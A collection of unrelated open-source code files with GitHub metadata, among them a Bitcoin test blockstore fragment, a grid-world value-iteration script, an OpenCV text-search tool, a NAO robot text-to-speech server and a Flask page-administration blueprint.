f = BytesIO(serialized_tx)
ret = CTransaction()
ret.deserialize(f)
ret.calc_sha256()
return ret
def add_transaction(self, tx):
tx.calc_sha256()
try:
self.txDB[repr(tx.sha256)] = bytes(tx.serialize())
except TypeError as e:
print("Unexpected error: ", sys.exc_info()[0], e.args)
def get_transactions(self, inv):
responses = []
for i in inv:
if (i.type == 1): # MSG_TX
tx = self.get(i.hash)
if tx is not None:
responses.append(msg_generic(b"tx", tx))
return responses
| {
"content_hash": "688e6b752c53e001ac59cbc86900dcc6",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 77,
"avg_line_length": 33.05128205128205,
"alnum_prop": 0.548099301784329,
"repo_name": "realzzt/BitCoin2013",
"id": "e76016d79b14a984b7d258389be831bebe8806d3",
"size": "5580",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/test_framework/blockstore.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "29375"
},
{
"name": "C",
"bytes": "703206"
},
{
"name": "C++",
"bytes": "4667168"
},
{
"name": "CSS",
"bytes": "1216"
},
{
"name": "HTML",
"bytes": "51842"
},
{
"name": "Java",
"bytes": "33209"
},
{
"name": "M4",
"bytes": "189542"
},
{
"name": "Makefile",
"bytes": "102451"
},
{
"name": "Objective-C",
"bytes": "4081"
},
{
"name": "Objective-C++",
"bytes": "7465"
},
{
"name": "Protocol Buffer",
"bytes": "2376"
},
{
"name": "Python",
"bytes": "983598"
},
{
"name": "QMake",
"bytes": "4108"
},
{
"name": "Shell",
"bytes": "50752"
}
],
"symlink_target": ""
} |
from netCDF4.utils import *
from netCDF4.utils import _quantize, _StartCountStride, _out_array_shape
| {
"content_hash": "d2673836263876ec313ae2744e5d7c2b",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 72,
"avg_line_length": 50.5,
"alnum_prop": 0.801980198019802,
"repo_name": "mathause/netCDF4p",
"id": "1bc94c90ff3beb858c09dba7e80af99df72c19b7",
"size": "160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netCDF4p/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "200806"
}
],
"symlink_target": ""
} |
import numpy as np
from grid_world import standard_grid, negative_grid
from iterative_policy_evaluation import print_values, print_policy
SMALL_ENOUGH = 1e-3
GAMMA = 0.9
ALL_POSSIBLE_ACTIONS = ('U', 'D', 'L', 'R')
# this is deterministic
# all p(s',r|s,a) = 1 or 0
if __name__ == '__main__':
# this grid gives you a reward of -0.1 for every non-terminal state
# we want to see if this will encourage finding a shorter path to the goal
grid = negative_grid()
# print rewards
print("rewards:")
print_values(grid.rewards, grid)
# state -> action
# we'll randomly choose an action and update as we learn
policy = {}
for s in grid.actions.keys():
policy[s] = np.random.choice(ALL_POSSIBLE_ACTIONS)
# initial policy
print("initial policy:")
print_policy(policy, grid)
# initialize V(s)
V = {}
states = grid.all_states()
for s in states:
# V[s] = 0
if s in grid.actions:
V[s] = np.random.random()
else:
# terminal state
V[s] = 0
# repeat until convergence
# V[s] = max[a]{ sum[s',r] { p(s',r|s,a)[r + gamma*V[s']] } }
while True:
biggest_change = 0
for s in states:
old_v = V[s]
# V(s) only has value if it's not a terminal state
if s in policy:
new_v = float('-inf')
for a in ALL_POSSIBLE_ACTIONS:
grid.set_state(s)
r = grid.move(a)
v = r + GAMMA * V[grid.current_state()]
if v > new_v:
new_v = v
V[s] = new_v
biggest_change = max(biggest_change, np.abs(old_v - V[s]))
if biggest_change < SMALL_ENOUGH:
break
# find a policy that leads to optimal value function
for s in policy.keys():
best_a = None
best_value = float('-inf')
# loop through all possible actions to find the best current action
for a in ALL_POSSIBLE_ACTIONS:
grid.set_state(s)
r = grid.move(a)
v = r + GAMMA * V[grid.current_state()]
if v > best_value:
best_value = v
best_a = a
policy[s] = best_a
# our goal here is to verify that we get the same answer as with policy iteration
print("values:")
print_values(V, grid)
print("policy:")
print_policy(policy, grid)
| {
"content_hash": "a9f05cff23c655cdad562100f469c461",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 83,
"avg_line_length": 26.878048780487806,
"alnum_prop": 0.6011796733212341,
"repo_name": "balazssimon/ml-playground",
"id": "548824d5b9897eac00038376bfa98322ab7f4dd4",
"size": "2204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "udemy/lazyprogrammer/reinforcement-learning-python/value_iteration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "468040"
},
{
"name": "Python",
"bytes": "446476"
},
{
"name": "R",
"bytes": "60424"
}
],
"symlink_target": ""
} |
"""
USAGE:
text-search.py <string> <image>...
"""
from classifier import load_classifier
import cv2
import docopt
from features import hogdesc
import mserfeatures
import numpy as np
import ocr
from random import randint
from rectutils import find_words, next_on_same_line, on_consecutive_line, same_height
import searchcriteria
from searchcriteria import SearchCriteria
import templates
import time
import utils
def prepare_detect(img, rects):
vec = np.empty((len(rects), 24, 24), np.uint8)
for i in range(0,len(rects)):
x, y, w, h = rects[i]
roi = img[y:y+h,x:x+w]
roi = cv2.resize(roi, (24,24))
vec[i] = roi
return hogdesc(vec)
def clip_coupon(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, img_bin = cv2.threshold(img_grey ,127, 255, cv2.THRESH_BINARY)
imgc, contours, hierarchy = cv2.findContours(img_bin, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contours_area = np.array([cv2.contourArea(c) for c in contours])
main_contour = np.array(contours)[np.where(contours_area == contours_area.max())][0]
x, y, w, h = cv2.boundingRect(main_contour)
return img[y:y+h,x:x+w]
if __name__ == '__main__':
arguments = docopt.docopt(__doc__)
classifier = load_classifier()
for i in arguments['<image>']:
words = []
for w in arguments['<string>'].split(' '):
sc = SearchCriteria.parse(w)
templates2d = templates.get_templates(sc.tokens)
words.append({'word': w, 'sc': sc, 'templates2d': templates2d, 'matches': []})
img = cv2.imread(i)
img = clip_coupon(img)
img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# sharpen image
blur = cv2.GaussianBlur(img_grey, (-1,-1), 3)
img_grey = cv2.addWeighted(img_grey, 1.5, blur, -0.5, 0)
# text region features
char_rects = mserfeatures.get_features(img_grey)
# filter aspect ratio
#non_char_rects = [r for r in char_rects if (1.0/5.0) > float(r[2])/float(r[3]) or float(r[2])/float(r[3]) > 5]
rect_word_rects = find_words(char_rects)
img_rects = mserfeatures.get_inverse_features_with_canny(img, char_rects)
#continue
# img1 = img.copy()
# utils.draw_rects(img1, char_rects)
# cv2.namedWindow('img rects', cv2.WINDOW_NORMAL)
# cv2.imshow('img rects', img1)
# cv2.waitKey()
# quit()
# label features
start = time.time()
print "Running classifier..."
vec = prepare_detect(img_grey, char_rects)
char_results = classifier.predict(vec)
char_results = char_results.reshape(-1)
print "took %fs" % (time.time() - start,)
for w in words:
sc = w['sc']
templates2d = w['templates2d']
matches = w['matches']
if sc.tokens == ['{','}']:
matches.extend(rect_word_rects)
continue
elif sc.tokens == ['\\','i']:
#matches.extend(np.array(char_rects)[char_results == 0])
matches.extend(img_rects)
continue
# word features
char_matches = np.in1d(char_results, list(sc.indexset()))
matching_char_rects = np.array(char_rects, int)[char_matches]
matching_char_results = char_results[char_matches]
word_rects = []
for result, rect in zip(matching_char_results, matching_char_rects):
key = searchcriteria.get_label_value(int(result)).lower()
for t in templates2d[key]:
word_rects.append(t.match2d(rect))
# filter within image
word_rects = [r for r in word_rects if not (r[0] < 0 or r[1] < 0 or r[2] > img.shape[1] or r[3] > img.shape[0])]
start = time.time()
print "Running OCR..."
for r in word_rects:
roi = img_grey[r[1]:r[1]+r[3],r[0]:r[0]+r[2]]
text = ocr.ocr(roi)
for m in templates.match(sc.tokens, text.lower()):
matches.append(r)
print "took %fs" % (time.time() - start,)
start = time.time()
print "Matching words and lines..."
line_matches = [[r] for r in words[0]['matches']]
for idx in range(1, len(words)):
tmp = []
second_word_matches = words[idx]['matches']
for lm in line_matches:
for r2 in second_word_matches:
r1 = lm[-1]
if same_height(r1, r2) and (next_on_same_line(r1, r2) or on_consecutive_line(r1, r2)):
tmp.append(list(lm) + [r2])
line_matches = tmp
print "took %fs" % (time.time() - start,)
for lm in line_matches:
color = (randint(0,255), randint(0,255), randint(0,255))
x, y, w, h = cv2.boundingRect(np.concatenate([utils.points(r) for r in lm]))
img = cv2.rectangle(img, (x,y), (x+w,y+h), color, 2)
# extract text of match
roi = img_grey[y:y+h,x:x+w]
text = ocr.ocr(roi)
print color, text
cv2.namedWindow('Matches ' + i, cv2.WINDOW_NORMAL)
cv2.imshow('Matches ' + i, img)
cv2.waitKey() | {
"content_hash": "83a7f2cdc71defd06ab45bc8947af236",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 124,
"avg_line_length": 35.777027027027025,
"alnum_prop": 0.5567516525023607,
"repo_name": "szakrewsky/text-search",
"id": "d7b96ee24d00e83adb11eed320571da0060d90bd",
"size": "5310",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "text-search.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26678"
}
],
"symlink_target": ""
} |
from .link import Link
from .image import Image
class MessageContent(object):
"""MessageContent.
:param links:
:type links: list[~mailosaur.models.Link]
:param images:
:type images: list[~mailosaur.models.Image]
:param body:
:type body: str
"""
def __init__(self, data=None):
if data is None:
data = {}
self.links = [Link(i) for i in data.get('links', [])]
images = data.get('images', None)
if isinstance(images, list):
self.images = [Image(i) for i in images]
self.body = data.get('body', None)
| {
"content_hash": "bcccae32ce76917175cca00cde0c6f87",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 61,
"avg_line_length": 24.08,
"alnum_prop": 0.5764119601328903,
"repo_name": "mailosaurapp/mailosaur-python",
"id": "f51a6cf50776ec771750292aed5df406594f8069",
"size": "602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mailosaur/models/message_content.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14151"
}
],
"symlink_target": ""
} |
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
py_version = sys.version_info[:2]
here = os.path.abspath(os.path.dirname(__file__))
try:
README = open(os.path.join(here, "README.rst")).read()
README += open(os.path.join(here, "HISTORY.rst")).read()
except IOError:
README = "http://ikame.github.com/Rockefeller"
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
setup(name="Rockefeller",
version="1.2.2",
description="Money, currencies and exchange rates library.",
long_description=README,
author="ikame",
author_email="[email protected]",
url="http://anler.github.com/Rockefeller/",
license="MIT",
install_requires=["six"],
tests_require=["pytest", "mock"],
cmdclass={"test": PyTest},
keywords="money currency exchange rates",
classifiers=[
"Environment :: Plugins",
"Environment :: Console",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"Intended Audience :: Financial and Insurance Industry",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Office/Business :: Financial"])
| {
"content_hash": "f425b6d9428d30f74c895240dc35f6ab",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 73,
"avg_line_length": 32.44,
"alnum_prop": 0.6245376078914919,
"repo_name": "anler/Rockefeller",
"id": "0b6d14c167aa166cc0e4295baa3af909613be021",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "243615"
}
],
"symlink_target": ""
} |
import time
#import urllib2
#import requests
import subprocess
import os
import re
#import cookielib, urllib2
class MetadataError(ValueError):
pass
class MetadataRecord:
def __init__(self, ID, params):
self.ID = ID
self.lg = params[0]
self.dialect = params[1]
self.speakers = params[2].split(';')
self.sources = params[3].split(';')
self.recordingname = params[4]
try:
self.recordingdate = time.strftime("%Y-%m-%e",time.strptime(params[5].strip(),"%d-%b-%y"))+"T12:00:00Z/DAY"#choosing noon for unknown time
except ValueError:
#self.recordingdate = time.strftime("%Y-%m-%e",time.strptime("01-Jan-70","%d-%b-%y"))+"T12:00:00Z/DAY"
self.recordingdate = False
self.recordinglinguists = params[6].split(';')
self.anlalink = params[7]
self.editedbyspeaker = False
if params[8].lower() == 'Y':
self.editedbyspeaker = True
self.editedbylinguist = False
if params[9].lower() == 'Y':
self.editedbylinguist = True
self.texttypes = params[10].split(';')
self.rejectedbyspeaker = False
if params[11].lower() == 'Y':
self.rejectedbyspeaker = True
def toSOLRstring(self):
singlevalues = """<field name="aagdID">{ID}</field>
<field name="lg">{lg}</field>
<field name="dialect">{dialect}</field>
<field name="recordingname">{recordingname}</field>
<field name="anlalink">{anlalink}</field>
<field name="editedbyspeaker">{editedbyspeaker}</field>
<field name="editedbylinguist">{editedbylinguist}</field>
<field name="rejectedbyspeaker">{rejectedbyspeaker}</field>""".format(**self.__dict__)
if self.recordingdate:
singlevalues += """\n<field name="recordingdate">%s</field>"""%self.recordingdate
speakers = '\n'.join(['<field name="speaker">%s</field>'%spkr for spkr in self.speakers])
sources = '\n'.join(['<field name="source">%s</field>'%src for src in self.sources])
recordinglinguists = '\n'.join(['<field name="recordinglinguist">%s</field>'%rl for rl in self.recordinglinguists])
texttypes = '\n'.join(['<field name="texttype">%s</field>'%tt for tt in self.texttypes])
s = ''.join((singlevalues,speakers,sources,recordinglinguists,texttypes))
return s
class Metadata:
def __init__(self,csvfile,url):
self.chunks = {}
if csvfile != None:
lines = open(csvfile).readlines()[1:] #drop first line where the labels are
else:
#syscall = "wget %s" % url #urllib2 has problems with cookies
#print syscall
subprocess.call(["wget", "-O" "/tmp/metadatafile", url])
#cj = cookielib.CookieJar()
#opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
#urllib2.install_opener(opener)
#f = urllib2.urlopen(url)
f = open('/tmp/metadatafile')
#lines=f.readlines()
lines=re.split('[\r\n]',f.read())
#os.remove("metadatafile")
print len(lines)
for line in lines:
fields = line.split('\t')
ID = fields[0]
self.chunks[ID] = MetadataRecord(ID,fields[1:])
class Language:
def __init__(self,name,iso,coords):
self.name=name
self.iso=iso
self.coords=coords
| {
"content_hash": "dce7706df3f8263456b4aaf2eedc551e",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 143,
"avg_line_length": 35.2247191011236,
"alnum_prop": 0.6478468899521531,
"repo_name": "Glottotopia/aagd",
"id": "33d7ce4a1123e67813ffd8e6a8351ca591bf3850",
"size": "3135",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "importscripts/athahelpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "152885"
},
{
"name": "CSS",
"bytes": "454208"
},
{
"name": "ColdFusion",
"bytes": "438820"
},
{
"name": "HTML",
"bytes": "1998354"
},
{
"name": "Java",
"bytes": "510468"
},
{
"name": "JavaScript",
"bytes": "6505329"
},
{
"name": "Lasso",
"bytes": "72399"
},
{
"name": "Makefile",
"bytes": "10216"
},
{
"name": "PHP",
"bytes": "259528"
},
{
"name": "Perl",
"bytes": "137186"
},
{
"name": "Python",
"bytes": "13713475"
},
{
"name": "Shell",
"bytes": "346"
},
{
"name": "XSLT",
"bytes": "15970"
}
],
"symlink_target": ""
} |
from distutils.core import setup
from Cython.Distutils import build_ext
from Cython.Distutils.extension import Extension
classifiers = """
Development Status :: 1 - Beta
Intended Audience :: Developers
Operating System :: OS Independent
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Software Development :: Libraries
Topic :: Database
"""
with open('README.rst') as f:
long_description = f.read()
setup(
name='python-luxio',
version='0.0.4',
license='New BSD',
description='Python extension for Lux IO',
author='Takashi Matsuno',
author_email='[email protected]',
url='https://github.com/gonsuke/python-luxio',
long_description=long_description,
packages = ['luxio'],
ext_modules=[
Extension(
"luxio._luxio",
["luxio/_luxio.pyx", "luxio/_luxio.pxd"],
language="c++",
libraries=['luxio']
)
],
cmdclass={'build_ext': build_ext},
)
| {
"content_hash": "457bfcff2b5d1fc607b031e76b4534e6",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 53,
"avg_line_length": 26.56756756756757,
"alnum_prop": 0.6429298067141404,
"repo_name": "gonsuke/python-luxio",
"id": "580fecb1040763e5d5e14ab459fa5b20af6739d6",
"size": "983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "17"
},
{
"name": "C++",
"bytes": "138567"
},
{
"name": "Python",
"bytes": "9440"
}
],
"symlink_target": ""
} |
import rospy
import re
import md5
from hri_msgs.srv import TextToSpeechSubsentenceDurationResponse
from hri_framework import ITextToSpeechActionServer
from nao_hri import NaoNode
import rospkg
import naoqi
class TextToSpeechCache():
def __init__(self):
self.tts_time_hashes = {}
self.file_name = None
def load_tts_cache(self, path):
self.file_name = path
self.tts_time_hashes = {}
tts_cache = open(path, "r")
for line in tts_cache:
columns = re.split(";", line.strip())
if len(columns) == 3:
md5_hash = columns[0]
times = re.split(",", columns[1])
self.tts_time_hashes[md5_hash] = times
tts_cache.close()
rospy.loginfo("TTS cache loaded. File: {0} ".format(path))
def get_id(self, sentence):
return str(md5.new(sentence).hexdigest())
def is_cached(self, sentence):
md5_digest = self.get_id(sentence)
if md5_digest in self.tts_time_hashes:
return True
else:
return False
def get_sentence_times(self, sentence):
return self.tts_time_hashes[self.get_id(sentence)]
def add_sentence(self, sentence, word_times):
with open(self.file_name, "a") as tts_cache:
md5_digest = self.get_id(sentence)
tts_cache.write(md5_digest + ";" + str(word_times).replace("[", "").replace("]", "") + ";" + sentence.replace(";", "") + "\n")
self.tts_time_hashes[md5_digest] = word_times
class NaoTextToSpeechActionServer(ITextToSpeechActionServer, NaoNode):
def __init__(self):
ITextToSpeechActionServer.__init__(self)
self.tts_cache = TextToSpeechCache()
# Text to speech arguments
self.num_words_sentence = 0
self.current_word_index = 0
self.word_times = []
self.start_time = None
self.calc_synth_times = True
self.utterance_id = None
# Naoqi
self.tts_proxy = None
self.mem_proxy = None
def start(self):
if rospy.has_param("nao_tts_cache"):
path = rospy.get_param("nao_tts_cache")
self.tts_cache.load_tts_cache(path)
module_name = self.get_instance_name(globals())
NaoNode.__init__(self, module_name)
self.tts_proxy = self.get_proxy('ALTextToSpeech')
self.mem_proxy = self.get_proxy('ALMemory')
self.subscribe()
ITextToSpeechActionServer.start(self)
else:
raise Exception('nao_tts_cache parameter not found')
def synthesise_sentence(self, sentence):
self.num_words_sentence = NaoTextToSpeechActionServer.words_in_text(sentence)
self.current_word_index = 0
self.word_times = []
self.word_times.append(0.0)
self.start_time = rospy.get_time()
if self.tts_cache.is_cached(sentence):
self.calc_synth_times = False
else:
self.calc_synth_times = True
self.utterance_id = self.tts_proxy.post.say(sentence)
rospy.loginfo("Synthesis started: '{0}'".format(sentence))
def tts_subsentence_duration(self, sentence, start_word_index, end_word_index):
# If have spoken sentence before, then get the length of time it took to speak each word
# and return duration of subsentence
if self.tts_cache.is_cached(sentence):
times = self.tts_cache.get_sentence_times(sentence)
duration = float(times[end_word_index]) - float(times[start_word_index]) # End word is beginning of next word
else:
# Else estimate the length of time it takes to speak a subsentence
words = NaoTextToSpeechActionServer.get_words(sentence)
sub_text = ''
for i in range(start_word_index, end_word_index):
sub_text += words[i] + ' '
num_characters = len(sub_text)
duration = num_characters * 0.092055994
return duration
def current_word_changed(self, event_name, value, sub_id):
if self.current_word_index != 0 and self.server.is_active():
word_start_time = rospy.get_time() - self.start_time
self.word_times.append(word_start_time)
self.send_feedback(self.current_word_index)
self.current_word_index += 1
def word_pos_changed(self, event_name, value, sub_id):
# If at end of sentence...
if self.server.is_active() and self.current_word_index >= self.num_words_sentence and value == 0:
word_start_time = rospy.get_time() - self.start_time
self.word_times.append(word_start_time)
if self.calc_synth_times:
self.tts_cache.add_sentence(self.server.current_goal.get_goal().sentence, self.word_times)
self.synthesis_finished()
def on_shutdown(self):
self.unsubscribe()
def cancel_tts_synthesis(self):
self.tts_proxy.stop(self.utterance_id)
@staticmethod
def words_in_text(text):
valid_words_regex = "\w+[']{0,1}\w*[!?,.]{0,1}"
return len(re.findall(valid_words_regex, text))
@staticmethod
def get_words(text):
valid_words_regex = "\w+[']{0,1}\w*[!?,.]{0,1}"
return re.findall(valid_words_regex, text)
def subscribe(self):
self.tts_proxy.enableNotifications()
self.mem_proxy.subscribeToEvent("ALTextToSpeech/PositionOfCurrentWord", self.module_name, "word_pos_changed")
self.mem_proxy.subscribeToEvent("ALTextToSpeech/CurrentWord", self.module_name, "current_word_changed")
rospy.loginfo("Subscribed to ALTextToSpeech events.")
def unsubscribe(self):
self.mem_proxy.unsubscribeToEvent("ALTextToSpeech/PositionOfCurrentWord", self.module_name)
self.mem_proxy.unsubscribeToEvent("ALTextToSpeech/CurrentWord", self.module_name)
self.tts_proxy.disableNotifications()
rospy.loginfo("Un-subscribed from ALTextToSpeech events.")
if __name__ == '__main__':
rospy.init_node('tts_action_server')
tts_server = NaoTextToSpeechActionServer()
tts_server.start()
rospy.spin() | {
"content_hash": "180896f193c012ea222585b0bb118e4e",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 138,
"avg_line_length": 36.06432748538012,
"alnum_prop": 0.6189395167828766,
"repo_name": "jdddog/nao_hri",
"id": "11117f1793f45bbf1256f16250b32bad92b62f30",
"size": "7730",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/nao_tts_action_server_node.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "73826"
}
],
"symlink_target": ""
} |
from multiprocessing import cpu_count
from numpy import floor
# from mkl import set_num_threads # mkl is never used outside of this
def configure(
num_jobs: int = 8,
test: bool = False,
subtract: int = 1,
num_proc: int = None,
num_thread_per_proc: int = None,
) -> int:
"""
num_jobs is typically the # of genes we are parallelizing over
"""
if num_proc is None:
num_proc = cpu_count() - subtract
if num_jobs > num_proc:
num_jobs = num_proc
if num_thread_per_proc is None:
num_thread_per_proc = int(floor(num_proc / num_jobs))
if test:
num_jobs = 1
num_thread_per_proc = 1
# try:
# set_num_threads(num_thread_per_proc)
# except ImportError:
# print("MKL not available, so I'm not adjusting the number of threads")
# print(f"Launching {num_jobs} jobs with {num_thread_per_proc} MKL threads each")
return num_jobs
| {
"content_hash": "4fde2941919078da5a11aa4f05468465",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 85,
"avg_line_length": 23.575,
"alnum_prop": 0.616118769883351,
"repo_name": "pablocarderam/genetargeter",
"id": "b667c8a30e226c330d6c596b969cd39f71c0359a",
"size": "943",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "gRNAScores/azimuth/local_multiprocessing.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "16396"
},
{
"name": "CSS",
"bytes": "7323"
},
{
"name": "HTML",
"bytes": "27988"
},
{
"name": "JavaScript",
"bytes": "412639"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "551082"
}
],
"symlink_target": ""
} |
"""
byceps.blueprints.admin.page.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
from flask import abort, g, request, url_for
from flask_babel import format_datetime, gettext
from ....services.page import service as page_service
from ....services.page.transfer.models import Page, Version, VersionID
from ....services.site import service as site_service
from ....services.site.transfer.models import Site, SiteID
from ....services.text_diff import service as text_diff_service
from ....services.user import service as user_service
from ....signals import page as page_signals
from ....util.framework.blueprint import create_blueprint
from ....util.framework.flash import flash_error, flash_success
from ....util.framework.templating import templated
from ....util.iterables import pairwise
from ....util.views import (
permission_required,
redirect_to,
respond_no_content_with_location,
)
from ...site.page.templating import build_template_context
from .forms import CreateForm, UpdateForm
blueprint = create_blueprint('page_admin', __name__)
@blueprint.get('/for_site/<site_id>')
@permission_required('page.view')
@templated
def index_for_site(site_id):
"""List pages for that site."""
site = _get_site(site_id)
pages = page_service.get_pages_for_site_with_current_versions(site.id)
user_ids = {page.current_version.creator_id for page in pages}
users = user_service.get_users(user_ids, include_avatars=True)
users_by_id = user_service.index_users_by_id(users)
return {
'pages': pages,
'users_by_id': users_by_id,
'site': site,
}
@blueprint.get('/pages/<uuid:page_id>/current_version')
@permission_required('page.view')
def view_current_version(page_id):
"""Show the current version of the page."""
current_version_id = page_service.find_current_version_id(page_id)
if current_version_id is None:
abort(404)
return view_version(current_version_id)
@blueprint.get('/versions/<uuid:version_id>')
@permission_required('page.view_history')
@templated
def view_version(version_id):
"""Show the page with the given id."""
version = _get_version(version_id)
page = page_service.get_page(version.page_id)
site = site_service.get_site(page.site_id)
creator = user_service.get_user(version.creator_id, include_avatar=True)
is_current_version = page_service.is_current_version(page.id, version.id)
return {
'page': page,
'site': site,
'version': version,
'creator': creator,
'is_current_version': is_current_version,
}
@blueprint.get('/versions/<uuid:version_id>/preview')
@permission_required('page.view_history')
@templated
def view_version_preview(version_id):
"""Show a preview of the page version."""
version = _get_version(version_id)
try:
template_context = build_template_context(
version.title, version.head, version.body
)
return {
'title': template_context['page_title'],
'head': template_context['head'],
'body': template_context['body'],
'error_occurred': False,
}
except Exception as e:
return {
'error_occurred': True,
'error_message': str(e),
}
@blueprint.get('/pages/<uuid:page_id>/history')
@permission_required('page.view_history')
@templated
def history(page_id):
"""Show index of page versions."""
page = _get_page(page_id)
versions = page_service.get_versions(page.id)
versions_pairwise = list(pairwise(versions + [None]))
user_ids = {version.creator_id for version in versions}
users = user_service.get_users(user_ids, include_avatars=True)
users_by_id = user_service.index_users_by_id(users)
site = site_service.get_site(page.site_id)
return {
'page': page,
'versions_pairwise': versions_pairwise,
'users_by_id': users_by_id,
'site': site,
}
@blueprint.get('/pages/<uuid:from_version_id>/compare_to/<uuid:to_version_id>')
@permission_required('page.view_history')
@templated
def compare(from_version_id, to_version_id):
"""Show the difference between two versions."""
from_version = _get_version(from_version_id)
to_version = _get_version(to_version_id)
if from_version.page_id != to_version.page_id:
abort(400, 'The versions do not belong to the same page.')
html_diff_title = _create_html_diff(from_version, to_version, 'title')
html_diff_head = _create_html_diff(from_version, to_version, 'head')
html_diff_body = _create_html_diff(from_version, to_version, 'body')
page = page_service.get_page(from_version.page_id)
site = site_service.get_site(page.site_id)
return {
'page': page,
'diff_title': html_diff_title,
'diff_head': html_diff_head,
'diff_body': html_diff_body,
'site': site,
}
def _create_html_diff(
from_version: Version,
to_version: Version,
attribute_name: str,
) -> Optional[str]:
"""Create an HTML diff between the named attribute's value of each
of the two versions.
"""
from_description = format_datetime(from_version.created_at)
to_description = format_datetime(to_version.created_at)
from_text = getattr(from_version, attribute_name)
to_text = getattr(to_version, attribute_name)
return text_diff_service.create_html_diff(
from_text, to_text, from_description, to_description
)
@blueprint.get('/for_site/<site_id>/create')
@permission_required('page.create')
@templated
def create_form(site_id, erroneous_form=None):
"""Show form to create a page."""
site = _get_site(site_id)
form = erroneous_form if erroneous_form else CreateForm()
form.set_language_code_choices()
return {
'form': form,
'site': site,
}
@blueprint.post('/for_site/<site_id>')
@permission_required('page.create')
def create(site_id):
"""Create a page."""
site = _get_site(site_id)
form = CreateForm(request.form)
form.set_language_code_choices()
if not form.validate():
return create_form(site.id, form)
name = form.name.data.strip().lower()
language_code = form.language_code.data
url_path = form.url_path.data.strip()
creator = g.user
title = form.title.data.strip()
head = form.head.data.strip()
body = form.body.data.strip()
version, event = page_service.create_page(
site.id,
name,
language_code,
url_path,
creator.id,
title,
body,
head=head,
)
flash_success(gettext('Page has been created.'))
page_signals.page_created.send(None, event=event)
return redirect_to('.view_version', version_id=version.id)
@blueprint.get('/pages/<uuid:page_id>/update')
@permission_required('page.update')
@templated
def update_form(page_id, erroneous_form=None):
"""Show form to update a page."""
page = _get_page(page_id)
current_version_id = page_service.find_current_version_id(page.id)
page_aggregate = page_service.find_page_aggregate(current_version_id)
form = erroneous_form if erroneous_form else UpdateForm(obj=page_aggregate)
form.set_language_code_choices()
site = site_service.get_site(page.site_id)
return {
'form': form,
'page': page,
'site': site,
}
@blueprint.post('/pages/<uuid:page_id>')
@permission_required('page.update')
def update(page_id):
"""Update a page."""
page = _get_page(page_id)
form = UpdateForm(request.form)
form.set_language_code_choices()
if not form.validate():
return update_form(page.id, form)
language_code = form.language_code.data
url_path = form.url_path.data.strip()
creator = g.user
title = form.title.data.strip()
head = form.head.data.strip()
body = form.body.data.strip()
version, event = page_service.update_page(
page.id,
language_code,
url_path,
creator.id,
title,
head,
body,
)
flash_success(gettext('Page has been updated.'))
page_signals.page_updated.send(None, event=event)
return redirect_to('.view_version', version_id=version.id)
@blueprint.delete('/pages/<uuid:page_id>')
@permission_required('page.delete')
@respond_no_content_with_location
def delete(page_id):
"""Delete a page."""
page = _get_page(page_id)
page_name = page.name
site_id = page.site_id
success, event = page_service.delete_page(page.id, initiator_id=g.user.id)
if not success:
flash_error(
gettext('Page "%(name)s" could not be deleted.', name=page_name)
)
return url_for('.view_current_version', page_id=page.id)
flash_success(gettext('Page "%(name)s" has been deleted.', name=page_name))
page_signals.page_deleted.send(None, event=event)
return url_for('.index_for_site', site_id=site_id)
def _get_site(site_id) -> Site:
site = site_service.find_site(SiteID(site_id))
if site is None:
abort(404)
return site
def _get_page(page_id) -> Page:
page = page_service.find_page(page_id)
if page is None:
abort(404)
return page
